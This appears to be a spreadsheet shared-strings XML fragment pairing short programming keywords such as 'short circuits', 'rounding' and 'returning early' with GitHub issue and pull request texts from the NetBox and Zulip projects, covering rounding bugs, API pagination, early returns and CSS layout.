    <t>I can't decide how I feel about the minor rounding changes; they seem like a wash though I'm a bit surprised as to their scale. In any case, the approach seems solid and the risk to `main` is basically none. Great to see these variables defined, merged, thanks @karlstolley!</t>
  </si>
  <si>
    <t>Support half-height rack units; Adding new device with 1.5U will fail due to rounding up or down. Technically this isn't a big deal, because I'd generally round up. . Example: . Palo Alto Firewall - PA3060 - Data Sheet: https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/datasheets/pa-3000-series-specsheet .</t>
  </si>
  <si>
    <t>Store result</t>
  </si>
  <si>
    <t>L BE CLOSED. This form is only for reproducible bugs. If you need assistance with. NetBox installation, or if you have a general question, DO NOT open an. issue. Instead, post to our mailing list:. https://groups.google.com/forum/#!forum/netbox-discuss. Please describe the environment in which you are running NetBox. Be sure. that you are running an unmodified instance of the latest stable release. before submitting a bug report, and that any plugins have been disabled. --&gt;. ### Environment. * Python version: Python 3.6. * NetBox version: Netbox 2.8.8. &lt;!--. Describe in detail the exact steps that someone else can take to reproduce. this bug using the current stable release of NetBox. Begin with the. creation of any necessary database objects and call out every operation. being performed explicitly. If reporting a bug in the REST API, be sure to. reconstruct the raw HTTP request(s) being made: Don't rely on a client. library such as pynetbox. --&gt;. ### Steps to Reproduce. 1. Create many rack reservation (say more than 500) at same time using API that "created" have same date. . 2. Extract rack reservation page using API where limit=25. Sample URL https://localhost/api/dcim/rack-reservations?limit=25. 3. Store result in a python list and check for total number of object and total number of distinct objects . Sample code. ```. import requests. url = 'https://localhost/api/dcim/rack-reservations?limit=25'. results = []. more = True. while more:. resp = requests.get(url).json(). url = resp['next']. results.extend(resp['results']). if not url:. more = False. print(f'total reservations retrieved: {len(results)}'). print(f"total unique IDs retrieved: {len(set([r['id'] for r in results]))}"). ```. &lt;!-- What did you expect to happen? --&gt;. ### Expected Behavior. "total reservations retrieved" should be same as "total unique IDs retrieved". &lt;!-- What happened instead? --&gt;. ### Observed Behavior. Number of "total unique IDs retrieved" is less than "total reservations retrieved".</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>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t>
  </si>
  <si>
    <t>short circuits</t>
  </si>
  <si>
    <t>Fixes #9001 &amp; #9190 - Add form validation to model installation; ### Fixes: #9190. Raises a ValidationError whenever installation would cause a foreign key violation. I tested all combinations I could think of. It short circuits on the first error. Batching all errors would cause a huge error message in most cases.</t>
  </si>
  <si>
    <t xml:space="preserve"> Data model extension. ### Proposed functionality. Storing circuit information in NetBox is great and provides a lot of value as of today! While thinking about storing Circuits of a large network into NetBox we came across one meta information of especially long haul circuits which might be interesting for a wider audience. I didn't find an issue similar to this idea yet, happy to close this as duplicate if that already exists. Especially long haul, or even intercontinental circuits, often consists of multiple parts or segments which are chained together to provide the circuit service, being it a dark fiber, wavelength, etc. with a segment being a local-loop sub-contracted by another provider, a under sea cable or similar. Particularly for intercontinental circuits it would be beneficial to store the under sea cable this circuit is carried on to be able to asses the diversity of existing circuits and determine the blast radius if a maintenance is scheduled. The same is true for short circuits where you want to keep track of parts of the path lets say between Frankfurt and and Amsterdam and map that to some segments. The idea is that segments can be freely created by the user and can mean anything from "under sea cable" to "left of the highway 42 between A and Z", so it's as generic as possible. It might be meaningful to add a Segment Type model as well to be able to differencialte between types of Segments. ### Use case. Explained above :). ### Database changes. This would introduce a new `Segment` or `Circuit Segment` model which I guess should be located within the Circuits section of the UI/API. The model would have a name and potentially slug and can have an n:m relationship with Circuits. It might make sense to also add a `Segment Type` model to allow the user to model types of segments they care about, for example "under sea cables" or "path left of highway 42". This model would have a name and potentially slug and a 1:n relationship with `Segments`. ### Exter</t>
  </si>
  <si>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</si>
  <si>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int8</t>
  </si>
  <si>
    <t xml:space="preserve">rces (VMs or bare metal servers) one business system or enother. Often we would like to know how much resources (VMs or bare metal servers) one system or another is using. ### Use case. A possible attributes for describing a business system:. 1) Application Name. 2) Application Description. 3) Application Type. - Commercial off-the-shelf (COTS). - COTS with Customization. - Custom. - ... 4) Tenant or Business Application Owner (for example, this field can refer to the Tenant entity of NetBox). This is the application owner from the business, for example, various departments or organizations, etc. 5) Contact (this field can refer to the contacts entity of NetBox). These are IT employees, for example, application administrator, devops engineer, etc. 6) Criticality. - Mission-critical. - Unit-critical. - High. - Medium. - Low. - Very Low. - ... 7) Is internet accessible. ### Database changes. A possible database schema could be something like this:. ```. CREATE TABLE criticality (. 	id int8 NOT NULL,. 	"name" varchar(64) NOT NULL,. 	last_updated timestamptz NULL,. created timestamptz NULL,. 	description text NULL,. 	CONSTRAINT criticality_pkey PRIMARY KEY (id). );. CREATE TABLE app_type (. 	id int8 NOT NULL,. 	"name" varchar(64) NOT NULL,. 	last_updated timestamptz NULL,. created timestamptz NULL,. 	description text NULL,. 	CONSTRAINT app_type_pkey PRIMARY KEY (id). );. CREATE TABLE businessapplication (. 	id int8 NOT NULL,. 	"name" varchar(256) NOT NULL,. 	last_updated timestamptz NULL,. created timestamptz NULL,. 	description text NULL,. 	tenant_id int8 NULL,. 	criticality_id int4 NULL,. 	notes text NULL,. app_type_id int4 NOT NULL,. is_internet_access BOOLEAN NOT NULL,. 	CONSTRAINT businessapplication_pkey PRIMARY KEY (id). );. ALTER TABLE businessapplication ADD CONSTRAINT fk_businessapplication_app_type FOREIGN KEY (app_type_id) REFERENCES app_type(id);. ALTER TABLE businessapplication ADD CONSTRAINT fk_businessapplication_criticality FOREIGN KEY (criticality_id) </t>
  </si>
  <si>
    <t>Wrong rounding in rack-level power utilization figure; ### NetBox version. v3.5.3. ### Python version. 3.8. ### Steps to Reproduce. 1. Create a power feed and some devices in a rack, such that the power utilization on the power feed is 2.5% - specific instructions in discussion #12837. 2. Look at the power feed utilization. 3. Look at the rack level power utilization. ### Expected Behavior. Both to show the same. ### Observed Behavior. Power-feed utilization shows as "2.5%". ![](https://user-images.githubusercontent.com/44789/244380583-33a6e41e-2c5a-41fa-9744-4df1e386cab3.png). But rack-level utilization power shows as "2.0%". ![](https://user-images.githubusercontent.com/44789/244382228-41acdf97-60e4-4e2c-a3ac-802ee4809d37.png). The problem is that percentage() in `netbox/utilities/templatetags/helpers.py` rounds to nearest 0.1%. ```. return round(x / y * 100, 1). ```. Whereas Rack.get_power_utilization in netbox/dcim/models/racks.py rounds down to integer:. ```. return int(allocated_draw / available_power_total * 100). ```.</t>
  </si>
  <si>
    <t>Release v3.5.4; ###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</si>
  <si>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etBox version. v3.6.6. ### Feature type. Data model extension. ### Proposed functionality. Create better protection against the deletion of devices. ---------------------------------------------------. **Possible idea**. One possible idea would be as with Windows domain controllers and their OUs. . See example here: https://www.wintips.org/fix-object-is-protected-from-accidental-deletion-you-do-not-have-sufficient-privileges-to-delete-ou/. Improvement related to Netbox:. A Device is created and a field "Protect Device from accidental deletion" is set to TRUE. If an operator deletes a Device, he receives the message that this Device is protected against deletion. The operator must set the protection to FALSE in the properties before he can delete the device. . ---------------------------------------------------. **Reason:**. When I set up Netbox, the same thing happened to me as happened to a colleague today. Only I had deleted 2 devices and he had deleted 26 devices. He too had already sorted many devices into racks. But he too has only now fallen into the trap. How did this happen / how can something like this happen? A rack with devices already documented in Netbox is to be reorganized for planning. . - He has taken a screenshot of the rack and wanted to remove all Devices from the rack. - He clicks on a device in the rack and clicks on Delete. - He repeated this until all devices had been removed from the rack. Only when he added them did he realize that he had not deleted the devices from the rack, but the device itself. Result:. We had to restore a backup from the previous day. Fortunately, I only made one small change that I was able to document. Otherwise the change would have been lost one day. Or the colleague would have had to recreate and document many devices. ### Use case. Devices are not accidentally deleted, which involves a lot of work. After all, this is the core of everything. ### Database changes. _No response_. ### External dependencies. _No resp</t>
  </si>
  <si>
    <t>temporary variables</t>
  </si>
  <si>
    <t>button, if the generated string is acceptable, the operator just needs to add the trailing part of the device name in order to make it unique before creating the device instance. The device name prefix generation and proposal should work only on-demand by pushing the button. The device name prefix calculation could be based on:. - a predefined rule. - a custom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t>
  </si>
  <si>
    <t>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could be used only as hints to generate the consistent naming but these hints are not enough because they could include also infos not strictly needed for device name creation. E.g.: a site could be named "S01 Headquarter Site" and the consistent naming should use only the "S01" part, i.e. the first 3 characters. At the moment different network operators coul</t>
  </si>
  <si>
    <t>15524 round iprange utilization; ### Fixes: #15524 . Change utilization for IPRange from truncating to rounding.</t>
  </si>
  <si>
    <t>](https://github.com/netbox-community/netbox/issues/15894)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</si>
  <si>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</si>
  <si>
    <t>provision: Handle VENV_CACHE_PATH not existing.; If VENV_CACHE_PATH does not exist (which can happen if you destroy. your vagrant environment), then do a short circuit return in. try_to_copy_venv().</t>
  </si>
  <si>
    <t>search: Handle pm-with/sender failures better.; If a user hand types `pm-with:invalid@example.com` into the search bar, our JS code tries to update the PM list, instead of short-circuiting earlier. This leads to some spurious errors that we could probably short circuit as soon as we determined the search was invalid.</t>
  </si>
  <si>
    <t>Change the settings .content-wrapper to be absolutely positioned.; The settings .content-wrapper element would break its float sometimes with browser zoom due to pixel rounding errors. By changing its positioning to absolute, the issue is fixed by forcing it to always reside next to the sidebar.</t>
  </si>
  <si>
    <t>Clean up reactions code; One goal here is to make one of our stack traces report a more clear error. We also short circuit better when we can't find the message in message_store.</t>
  </si>
  <si>
    <t>Notify offline users about edited stream messages.; We now do push notifications and missed message emails. for offline users who are subscribed to the stream for. a message that has been edited, but we short circuit. the offline-notification logic for any user who presumably. would have already received a notification on the original. message. This effectively boils down to sending notifications to newly. mentioned users. The motivating use case here is that you. forget to mention somebody in a message, and then you edit. the message to mention the person. If they are offline, they. will now get pushed notifications and missed message emails,. with some minor caveats. We try to mostly use the same techniques here as the. send-message code path, and we share common code with the. send-message path once we get to the Tornado layer and call. maybe_enqueue_notifications. The major places where we differ are in a function called. maybe_enqueue_notifications_for_message_update, and the top. of that function short circuits a bunch of cases where we. can mostly assume that the original message had an offline. notification. We can expect a couple changes in the future:. * Requirements may change here, and it might make sense. to send offline notifications on the update side even. in circumstances where the original message had a. notification. * We may track more notifications in a DB model, which. may simplify our short-circuit logic. In the view/action layer, we already had two separate codepaths. for send-message and update-message, but this mostly echoes. what the send-message path does in terms of collecting data. about recipients.</t>
  </si>
  <si>
    <t>short circuited</t>
  </si>
  <si>
    <t>difficult: Clean up missed message hook for bots/API case; @timabbott @rishig @gnprice . Right before xmas, we made a quick fix to prevent tracebacks for programs that were subscribed to all streams. Somebody was running Hubot, which subscribes to all streams. The current code was setting `flags` to None, and this caused a traceback. Since the setting of `flags` to `None` was equivalent to knowing that a bot had subscribed to all streams, we short circuited the bots case here:. https://github.com/zulip/zulip/commit/80477da4815163c9e569c2a93c1fc79a5e2c0d7c. We probably want a less janky approach here. First, earlier in the codepath, we should probably set `flags` to a value other than `None`, perhaps at least the empty list, but it's not clear why we don't show mention flags to the API clients. But if we do that change, we'll need to make sure the missed message hook knows how to properly ignore the events.</t>
  </si>
  <si>
    <t>attachments ui: Initialize table sorted by Date uploaded column.; Previously we only added the active class to the Date uploaded. column, thinking it was already sorted by upload date by default. However, it wasn't, so now we explicitly make a call to sort it by upload. date to fix an issue with broken sorting. Fixes #10518. @showell FYI, since we previously discussed it on the frontend stream on czo.</t>
  </si>
  <si>
    <t>returning early</t>
  </si>
  <si>
    <t>hashchange: Update state.old_hash before returning early; This fixes a bug where you can’t open the same overlay twice in a row in IE 11, which doesn’t support `HashChangeEvent.oldURL`; it was exposed by commit 05be16e051b1fd797429ff50cb90644543730a17 (late 2018). While here, parse the hash from `oldURL` in a less ad-hoc way. **Testing Plan:** Dev server. If you don’t have easy access to IE 11, you can reproduce in a modern browser by replacing `e.oldURL` with `undefined`. Cc @showell</t>
  </si>
  <si>
    <t>styles: Use range context queries to eliminate *_max variables; On a high-DPI display or with a non-default zoom level, the browser viewport may have a width strictly between `md_max` = 767px and `md_min` = 768px. Use only the `*_min` bounds for consistency. This requires queries with strict inequalities to express upper bounds (`width &lt; md_min`). Fortunately, that functionality is provided by range context queries. Unfortunately, those are not supported in all browsers. Fortunately, we can compile them away using postcss-media-minmax. Unfortunately, postcss-media-minmax currently subtracts 1px for strict inequalities anyway to work around a Safari rounding bug. Fortunately, 0.02px should be sufficient for that, so I submitted a PR: postcss/postcss-media-minmax#28. Cc @amanagr. **Testing plan:** Resized the browser in the dev server.</t>
  </si>
  <si>
    <t>"return" and put everthing below it in a else block because the return seems to be used in the ideea of stoping the execution of the code if we enter the case "if remaining_local_queue_size == 0". &gt; IMG_1 - event_queue.py. &gt; ![image](https://user-images.githubusercontent.com/46327732/169706098-a9b4921a-7914-4406-acb2-3466b615ad42.png). &gt; IMG_2 - queue_processors.py. &gt; ![image](https://user-images.githubusercontent.com/46327732/169706313-da5eba51-2826-480b-b24a-a378134bdf00.png). - [x] Issue 2. &gt; - Filename: zerver/tests/test_realm.py. &gt; - Issue: Remove this use of the output from "sort"; "sort" doesn’t return anything. The function "test_creating_realm_creates_system_groups(self) -&gt; None:" will return allways True, regardless of input, because "assertEqual(user_group_names.sort(), expected_system_group_names.sort())" is the same with "assertEqual(None, None)" which is allways True. &gt; - Fix: Save the data in 2 list variables, than sort them and after that call assertEqual on the already sorted lists. &gt; ![image](https://user-images.githubusercontent.com/46327732/169706851-3b76a479-37ed-4ae6-8283-aa3ff0738d6e.png). - [x] Issue 3. &gt; - Filename: zerver/views/message_send.py. &gt; - Issue: Remove this if statement or edit its code blocks so that they're not all the same. &gt; - Fix: Remove thie if statement or edit its code blocks. &gt; ![image](https://user-images.githubusercontent.com/46327732/169706962-6bba8a0e-9590-45ae-96e2-e9bbc2fbc2b7.png). - [ ] Issue 4. &gt; - Filename: templates/analytics/support.html, templates/corporate/billing.html. &gt; - Issue: Elements deprecated in HTML5 should not be used. With the advent of HTML5, many old elements were deprecated. To ensure the best user experience, deprecated elements should not be used. &gt; - Fix: Remove "center" and use CSS. &gt; ![image](https://user-images.githubusercontent.com/46327732/169707208-03dcf787-13cc-49c6-a77b-5dac60db073d.png). - This are all the issues I found to have a high impact on the project. Please let me know if so</t>
  </si>
  <si>
    <t>narrow: Show empty narrow when all stream topics muted.; Previously, if a user had muted all existing topics in a stream and then navigated to that stream narrow view, no empty narrow banner title / text was shown. Now the default empty narrow is shown in that case. See [relevant CZO conversation](https://chat.zulip.org/#narrow/stream/9-issues/topic/stream.20with.20all.20topics.20muted/near/1464912). **Notes (out of date, see update comment below)**:. - The 1st commit adds a check in `narrow.activate`, after the messages have been updated and processed, to show the empty narrow banner if the current message list is empty. - I added the check in the same place as other visual updates to the main message feed, such as `message_view_header.initialize`, which is towards the end of the flow for this process. - I thought about adding the show empty narrow banner call to `narrow.update_selection`, since that function already is part of `narrow.activate` and checks / returns early for `message_list.narrow.empty()`. In the end, it felt clearer to add it to where the other UI visual elements were being updated / initialized. - The 2nd commit removes the check from `message_fetch.process_results`. I put this in a separate commit as it might impact something I haven't considering in my testing. - This check covers the situation where the server does not return any messages for a narrow, but does not cover the situation where the user has flagged all the messages as muted via topics. - If we keep this check, then it just becomes duplicated by the check added in the previous commit. ---. **Screenshots and screen captures:**. &lt;details&gt;. &lt;summary&gt;CURRENT: Stream narrow with all topics muted&lt;/summary&gt;. ![Screenshot from 2022-11-16 20-21-23](https://user-images.githubusercontent.com/63245456/202274465-007bc9fa-69da-4b28-a286-8815dfaacc11.png). &lt;/details&gt;. &lt;details&gt;. &lt;summary&gt;UPDATED: Stream narrow with all topics muted&lt;/summary&gt;. ![Screenshot from 2022-11-16 20-18-38](https://user-im</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</si>
  <si>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Added a onclick event listener for the delete button in avatar.js which change the current avatar image to bot gravatar and changed value of a temporary variable bot_details.avatar_source to "G". The temporary avatar_source is passed to backend only when dialog_submit_button in edit bot form is clicked. Updated format_user_row function in lib/users.py to also return avatar_source field in realm_user. Updated zulip.yaml and 4 other tests to incorporate the new field avatar_source.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![image](https://user-images.githubusercontent.com/64723994/225087209-f71f24eb-7ee3-4a7e-907b-4190caf8a5e0.png). https://user-images.githubusercontent.com/64723994/225087419-0bdf357d-1f1b-4683-a0d8-0244ab0b793e.mp4.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</si>
  <si>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I added a delete button that appears when hovering over the current avatar. . Then, I added an event listener for the delete button in the build_bot_edit_widget function. When clicked, it changes the current avatar image to the bot's gravatar using people.medium_gravatar_url_for_email(), and sets the value of a temporary variable bot_details.avatar_source to "G". . This temporary avatar_source is only passed to the backend when the user confirms the change by clicking the dialog_submit_button in the edit bot form. Updated format_user_row function in lib/users.py to also return avatar_source field in realm_user. Updated zulip.yaml and 4 other tests to incorporate the new field avatar_source in realm_user. Follow-up: [realm_bots: Only send avatar_url when client cannot compute it. #24698](https://github.com/zulip/zulip/issues/24698).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![image](https://user-images.githubusercontent.com/64723994/225350026-6eaceb73-d7a8-4114-bbb5-c6d580cc885e.png). ![image](https://user-images.githubusercontent.com/64723994/225087209-f71f24eb-7ee3-4a7e-907b-4190caf8a5e0.png). https://user-images.githubuserco</t>
  </si>
  <si>
    <t>dialog_widget: Add horizontal padding to the modal content.; Previously, the modal content bottom border sometimes got hidden due to subpixel rounding. . This happens only at some Zoom levels and on Google Chrome. &lt;details&gt;. &lt;summary&gt; &lt;b&gt;Screenshots and screen captures:&lt;/b&gt; &lt;/summary&gt;. &lt;table&gt;. &lt;tr&gt;. &lt;th colspan="2"&gt;On 75% Zoom - Chrome 110&lt;/th&gt;. &lt;/tr&gt;. &lt;tr&gt;. &lt;th&gt;Before&lt;/th&gt;. &lt;th&gt;After&lt;/th&gt;. &lt;/tr&gt;. &lt;tr&gt;. &lt;td&gt;&lt;img src="https://github.com/sbansal1999/zulip/assets/35286603/5996a059-8945-4b8d-948f-180e544296ca)" alt="image"&gt;&lt;/td&gt;. &lt;td&gt;&lt;img src="https://github.com/sbansal1999/zulip/assets/35286603/45b67ef3-3c7c-4394-ad73-c20f544287de" alt="image"&gt;&lt;/td&gt;. &lt;/tr&gt;. &lt;/table&gt;. &lt;/details&gt;. CZO Discussion: [Link](https://chat.zulip.org/#narrow/stream/6-frontend/topic/border.20disappearing.20on.20zooming.20out/near/1625327).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t>
  </si>
  <si>
    <t>typeahead: Only return early from blur if parentElement is specified.; From a bug reported here:. https://chat.zulip.org/#narrow/stream/9-issues/topic/Typeahead.20fails.20to.20automatically.20close/near/1655321.</t>
  </si>
  <si>
    <t>server_history: Prevent concurrent requests for the same stream_id.; This PR updates the `get_server_history` function to return early if a request is already in progress for a given stream_id, thus preventing concurrent requests for a single stream_id. We maintain a set `request_pending_stream_ids`, which contains all the stream IDs for whom requests are in progress. Using this set, we return early. Fixes: #26915.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 ] Highlights technical choices and bugs encountered. - [ ] Calls out remaining decisions and concerns. - [x] Automated tests verify logic where appropriate. Individual commits are ready for review (see [commit discipline](https://zulip.readthedocs.io/en/latest/contributing/commit-discipline.html)).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[x] Corner cases, error conditions, and easily imagined bugs. &lt;/details&gt;.</t>
  </si>
  <si>
    <t>quantized</t>
  </si>
  <si>
    <t>ic Search Integration; ## Feature. Add semantic search to Zulip or allow for hybrid search ([ref1](https://weaviate.io/blog/hybrid-search-explained), [ref2](https://qdrant.tech/articles/hybrid-search/), [demo](https://demo.qdrant.tech/)). This would benefit the user experience massively as you can find anything that is related to your input **without the need to remember the exact keywords**! Just the meaning is enough to find what you're looking for. ## Background. The recent rise (or even race) in small language models that can run on CPU enables all kinds of applications - either a very lean on-demand backend service or even a frontend service like [SemanticFinder](https://do-me.github.io/SemanticFinder/) (Disclaimer: I'm the author). E.g. for English-only, according to the [MTEB leaderboard](https://huggingface.co/spaces/mteb/leaderboard) the current best small model appears to be [bge-small-en-v1.5](https://huggingface.co/BAAI/bge-small-en-v1.5) with only 134MB or only [34MB quantized](https://huggingface.co/Xenova/bge-small-en-v1.5/tree/main/onnx)! For other languages, this model could be switched by any other. The big advantage is that there is also the option of multilingual models, trained on 100+ languages being the perfect fit for multilingual organizations. ## Architecture . Every post would need to get one embedding. If it's very large, it would be chunked and for each chunk one mean embedding would be calculated. The calculation would best be done server-side but client-side is possible too with [transformers.js](https://github.com/xenova/transformers.js) (different chunking methods and transformers.js used in SemanticFinder). The embedding (=a vector of size 384) would need to be saved alongside the post metadata, either directly in Postgres (using pgvector plugin) or in a dedicated vector database like Qdrant, Weaviate etc. which are very scalable and performing much better than pgvector. The latter would have the benefit of keeping everything in the</t>
  </si>
  <si>
    <t>reliably reproduce that some of those conversations will end up being displayed in the recent view, despite not being temporally contiguous with what it has data for:. ![image](https://github.com/zulip/zulip/assets/2746074/f38ab44c-93d0-4697-ae0d-a8bf29f4a862). This issue was highlighted while testing https://github.com/zulip/zulip/pull/27030, and probably is a thing we will want to fix as part of 8.0 in order to get real benefit from the feature. The reason this happens is that the `message_fetch.js` code path calls `recent_view_ui.process_messages` regardless of how the messages were fetched -- so the messages fetched when narrowing are treated the same as messages fetched from the main `all_messages_data` backfill. I see two possible fixes:. * We could change the `message_fetch` logic to only update the recent view for `message_lists.home` fetches:. ``` diff. diff --git a/web/src/message_fetch.js b/web/src/message_fetch.js. index d8e0a513fb..faf55c986b 100644. --- a/web/src/message_fetch.js. +++ b/web/src/message_fetch.js. @@ -65,6 +65,7 @@ function process_result(data, opts) {. // We keep track of how far back we've fetched messages for, for messaging in. // the recent view. This assumes `data.messages` is already sorted. const oldest_timestamp = all_messages_data.first().timestamp;. + recent_view_ui.process_messages(messages);. recent_view_ui.set_oldest_message_date(. oldest_timestamp,. has_found_oldest,. @@ -73,7 +74,6 @@ function process_result(data, opts) {. }. . huddle_data.process_loaded_messages(messages);. - recent_view_ui.process_messages(messages);. stream_list.update_streams_sidebar();. stream_list.maybe_scroll_narrow_into_view();. . ```. * We could possibly do something more at the display layer, refusing to use any topics in its store are older than `all_messages_data.first()`. I think the above fix is probably the right solution, unless I'm missing some other code path that inserts items into `recent_view_data.js`. @amanagr can you take this one? .</t>
  </si>
  <si>
    <t xml:space="preserve">ke the inclusion of the sender, it definitely does not make sense for the same content in the same containing element to have a different height to it. That’s especially true as we look to support user-adjustments to information density. ## Sizing the message-area text: some notes and observations. * The current font-size in the message area is 14px, 2px smaller than the usual browser default of 16px; the `line-height` is currently a unitless value, declared as `1.214` on the `--message-box-line-height` variable; applied to the 14px font-size, that value produces a line-height of roughly 17px (16.996) . Unitless values are sometimes described as [the “preferred” way](https://developer.mozilla.org/en-US/docs/Web/CSS/line-height#number) of declaring line-heights; but they are not easily reasoned about nor the most effective approach when developing a precise baseline grid (especially when someone knows what they’re doing with line-heights and baseline grids). And given the very low tolerance for spacing errors within each Zulip message row, a precise baseline grid—one that can later be described in `em`-based size relationships—is very much called for. * While we should continue to support the current 14px size and perhaps default to it—especially because it will be familiar and, to some users, comfortable—it might be better to proceed establishing some consistent sizing relationships based on a 16px base font-size. * In some ways, the font-size is a lower-order concern than the spatial relationships: how tall of a line (`line-height`) text sits on, or the space between paragraphs and other supported content markup (headings, lists, code blocks). * To better support flexible information density that looks and, more importantly, feels good to users, there may not be a strict linear relationship between `font-size` and `line-height`. For example, a `16px` font-size might feel comfortable to read on its own, but sit on line-heights of `18px` on up to `22px` or higher. . </t>
  </si>
  <si>
    <t>tolerances</t>
  </si>
  <si>
    <t>ately-sent single-line or paragraph-only messages have the same vertical rhythm as multiple single lines or paragraphs within a single message; but note that at present a single-line list item has a very different footprint from a single-line paragraph. * It’s also worth considering how text-sizing within the message area affects the presentation of the UI for editing or viewing the source of messages; which also likely means coordinating the textarea in the compose box as well. ## WCAG 2.2 Considerations. * The WCAG has no straightforward recommendations for a base font-size; the closest to that is a note on the glossary entry for [large scale \(text\)](https://www.w3.org/TR/WCAG22/#dfn-large-scale). The note states “When using text without specifying the font size, the smallest font size used on major browsers for unspecified text would be a reasonable size to assume for the font.” But that’s an assumption (if not a tautology), not a recommendation. . * Still, there are certain tolerances that need to be built into accessible content. The WCAG stresses that content does not have to be presented by default with these values, but any content should be tolerant of browser zoom ([Success Criterion 1.4.4 Resize Text](https://www.w3.org/TR/WCAG22/#resize-text)) and user stylesheets ([Success Criterion 1.4.12 Text Spacing](https://www.w3.org/TR/WCAG22/#text-spacing)) to at least the following:. * “Except for [captions](https://www.w3.org/TR/WCAG22/#dfn-captions) and [images of text](https://www.w3.org/TR/WCAG22/#dfn-images-of-text), [text](https://www.w3.org/TR/WCAG22/#dfn-text) can be resized without [assistive technology](https://www.w3.org/TR/WCAG22/#dfn-assistive-technologies) up to 200 percent without loss of content or functionality.” . * Line height to at least 1.5 times the font size (line and a half spacing). * Spacing after paragraph to at least 2 times the font size. * Letter spacing to 0.12 times the font size. * Word spacing to at least 0.16 times the font s</t>
  </si>
  <si>
    <t>stream_edit_subscribers: Remove unnecessary logging.; There is no need to log if the stream edit UI is not opened when an event for updating subscribers list is received and we should just return because this is not a bug. We do the same in other places where we just return early without logging because we do not need to make any updates. &lt;!-- Describe your pull request here.--&gt;. Fixes: &lt;!-- Issue link, or clear description.--&gt; https://chat.zulip.org/#narrow/stream/9-issues/topic/stream_edit_subscribers.20console.20logging.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t>
  </si>
  <si>
    <t>settings: Add dev-environment-only settings for information density.; This PR sets the stage for work on #12611 by adding settings to the development environment that store pixel-based font-size and percentage-based line-height. [CZO Design discussion](https://chat.zulip.org/#narrow/stream/6-frontend/topic/Information.20density.3A.20typographic.20foundations/near/1724192). [CZO API design discussion](https://chat.zulip.org/#narrow/stream/378-api-design/topic/web.20information.20density.20settings/near/1753893). **Screenshots and screen captures:**. _Settings screen (dev only)_. ![Screen Shot 2024-03-26 at 16 14 13](https://github.com/zulip/zulip/assets/170719/fb42d32b-13a9-49db-8133-3d38820267b3). _Simulating 1.22 line height (rounding up from existing 1.214)_. There is a subtle shift in the second message area, but the paragraphs themselves present identically. Correcting for or improving the conditions behind that subtle shift is the kind of task that lies ahead. The example here is only to justify the rounding for the sake of storing an integer value (122) in the database. | Before (1.214) | After (1.22) |. | --- | --- |. | ![line-height-before](https://github.com/zulip/zulip/assets/170719/99c70179-df82-482f-8509-9b3db8a0fd46) | ![line-height-after-1 22](https://github.com/zulip/zulip/assets/170719/16ffca5a-b0a9-403b-add7-f8df824b79a7)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t>
  </si>
  <si>
    <t>info_density: Apply database values outside of dense mode (dev only).; Here we go. This PR applies database-stored information density values to the message-content area when "Dense mode" is unselected in user preferences. This is what's necessary to begin building out the information density project, and getting more Zulip developers in on experimenting with values as that project progresses. **Screenshots and screen captures:**. Small but compounding sub-pixel rounding causes shifts to certain elements. But overall, things look as they should in the subtle shift from 1.214 to 1.22 for a `line-height` value. | Before (legacy values) | After (legacy-equivalent db values). | --- | --- |. | ![legacy-info-density](https://github.com/zulip/zulip/assets/170719/65acbd48-0dd2-4f6b-b029-aac35d5b460b) | ![legacy-info-density-db-values](https://github.com/zulip/zulip/assets/170719/2e8ade32-97a1-45c9-8f20-ba2651e40fe4)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discipline](https://zulip.readthedocs.io/en/latest/contributing/commit-discipline.html)). - [x] Each commit i</t>
  </si>
  <si>
    <t>profile-fields: Check for date fields before initializing flatpickr.; See https://chat.zulip.org/#narrow/stream/9-issues/topic/user.20management.20-.20error.20in.20new.20realm.20on.20dev/near/1826159. Updates `initialize_custom_date_type_fields` to first check to see if there are any custom profile date type fields. If not, then there's nothing to initialize and return early. If there are, then initialize the event listeners for all custom profile date type fields. Manually tested updating settings/profile fields in dev environment with:. - Realm with no date fields. - Realm with one date field. - Realm with more than one date field.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t>
  </si>
  <si>
    <t>Investigate small vertical shift after entering message list; &lt;!-- Issue description --&gt;. As [reported](https://chat.zulip.org/#narrow/stream/9-issues/topic/small.20vertical.20shift.20after.20entering.20message.20list/near/1792674) by @gnprice : . ---. When I navigate to a message list, the messages appear… and then around 100-200ms later, some of the elements in the message pane shift downward by a couple of pixels. I suspect this is a regression in today's deployment, just because it feels pretty conspicuous to me and I don't recall seeing it before. Greg Price: I don't think I see this when navigating from one message list to another. But I do see it when going from "Recent conversations" to a message list. It reproduces each time if I just hit the back and then forward buttons, over and over — so that should be convenient for debugging, at least. Specifically, the things that move include:. - Status emoji after sender names. - Emoji reactions — the whole chips/pills, not just the emoji. - Some other pieces — for example [here](https://chat.zulip.org/#narrow/stream/415-chat.2Ezulip.2Eorg/topic/experiments/near/1786389), I see the bottom half or so of the message move down, while the top half stays in place. Perhaps the line-height increased by a fraction of a pixel? (And then the browser is effectively rounding the y-positions to integer pixels, for text clarity.). ---. We should investigate and try to track down this issue. See [CZO thread](https://chat.zulip.org/#narrow/stream/9-issues/topic/small.20vertical.20shift.20after.20entering.20message.20list/near/1792674) for discussion.</t>
  </si>
  <si>
    <t>left_sidebar: Refactor nav rows for low-resolution screens.; This PR refactors the left sidebar navigation rows in a way that does not disturb high-res presentation of the labels and icons, but makes a big improvement to low-res display of navigation rows in Chrome. The solution here effectively decouples the row height from the line-height, which was off in Chrome due to likely subpixel rounding errors in its font rendering engine. Instead, CSS Grid auto-generates rows as needed to the same `height` as would otherwise be specified on the `line-height`. [CZO discussion](https://chat.zulip.org/#narrow/stream/9-issues/topic/.F0.9F.8E.AF.20icons.20sagging.20on.20.60main.60/near/1825390).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 Chrome, low-res before | Chrome, low-res after |. | --- | --- |. | ![chrome-before](https://github.com/zulip/zulip/assets/170719/751256ab-e486-4be4-8e02-908319ce2cf5) | ![chrome-after](https://github.com/zulip/zulip/assets/170719/997817ca-3ccd-45aa-9a3f-0386a320f46e) |. | ![chrome-legacy-before](https://github.com/zulip/zulip/assets/170719/45a1c039-01c6-4545-b2ad-2e218196284c) | ![chrome-legacy-after](https://github.com/zulip/zulip/assets/170719/708a7571-72f2-4205-b9d8-3e352c38ec4e) |. | Chrome, high-res before | Chrome, high-res after (slight improvement?) |. | --- | --- |. | ![chrome-high-res-before](https://github.com/zulip/zulip/assets/170719/42f8e63d-4781-455e-ab59-1dda77ed088b) | ![chrome-high-res-after](https://github.com/zulip/zulip/assets/170719/d9be488c-53f3-414e-b1a9-372b01a920b3) |. | 